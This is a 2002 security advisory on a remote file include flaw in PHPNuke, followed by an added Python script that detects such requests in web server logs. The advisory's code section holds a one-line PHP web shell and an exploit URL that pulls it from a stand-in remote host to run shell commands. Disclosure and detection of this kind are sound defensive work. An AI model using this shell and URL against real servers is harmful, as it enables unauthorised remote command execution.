Title PHPNuke Remote Arbitrary File Include Vulnerability
Published 2002-01-16-12:00AM
Updated 2002-01-16-08:29PM
Class Input Validation Error
CVE   CAN-2002-0206
Remote  Yes
Local  No
Credit  This vulnerability was submitted to BugTraq on January 16th, 2002 by "Handle Nopman" <nopman@hackermail.com>.
Vulnerable  Francisco Burzi PHPNuke 5.3.1
Francisco Burzi PHPNuke 5.2 a
Francisco Burzi PHPNuke 5.2
Francisco Burzi PHPNuke 5.1
Francisco Burzi PHPNuke 5.0.1
Francisco Burzi PHPNuke 5.0
Francisco Burzi PHPNuke 4.4.1 a
Francisco Burzi PHPNuke 4.4
Francisco Burzi PHPNuke 4.3
Francisco Burzi PHPNuke 4.0
Francisco Burzi PHPNuke 3.0
Linux kernel 2.2
Francisco Burzi PHPNuke 2.5
Francisco Burzi PHPNuke 1.0
Not Vulnerable  
Code   Create the following file on a remote server:

<?php
system($cmd);
?>

The following URL will include the malicious file and allow the attacker to execute the "ls -al" command on the shell of the host running PHPNuke:

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
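
For defenders, the request shape above can be found in web server access logs. The following is an added example, not part of the original advisory: the function name and the sample log lines are constructed for illustration, and it assumes Common Log Format entries. It flags any request whose `file` parameter, once percent-decoded, starts with a URL scheme instead of a local name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: client, request line, status (other fields are skipped).
CLF_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# Value that starts with a URL scheme, "//" or a UNC prefix, not a local name.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.IGNORECASE)

def remote_include_attempts(log_lines, param="file"):
    """Return one record per request whose `param` value points off-host."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = CLF_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target, status = match.groups()
        # parse_qsl percent-decodes names and values once, so an encoded
        # "http%3A%2F%2F..." is compared in the same form as a literal one.
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append({"line": number, "client": client,
                             "status": int(status), "value": value})
    return hits

# Constructed sample entries; only the second request's URL is from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2002:10:00:01 +0000] '
    '"GET /index.php?file=article.php&sid=12 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [16/Jan/2002:10:02:13 +0000] '
    '"GET /index.php?file=http://where.the.bad.php.file.is/evil.php'
    '&cmd=ls%20-al HTTP/1.0" 200 812',
    '192.0.2.44 - - [16/Jan/2002:10:02:40 +0000] '
    '"GET /index.php?file=http%3A%2F%2Fexample.invalid%2Fx.php HTTP/1.0" 404 210',
    '192.0.2.77 - - [16/Jan/2002:10:05:00 +0000] '
    '"GET /index.php?name=News&file=friend HTTP/1.0" 200 3300',
]

if __name__ == "__main__":
    for hit in remote_include_attempts(SAMPLE_LOG):
        print(f'line {hit["line"]}: {hit["client"]} requested file='
              f'{hit["value"]} (status {hit["status"]})')
```

A hit answered with status 200 deserves a closer look than one answered with 404, since the include may have been processed.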
Copyright 2007, SecurityDot
Sat, 19 Dec 2009 04:51:28 +0000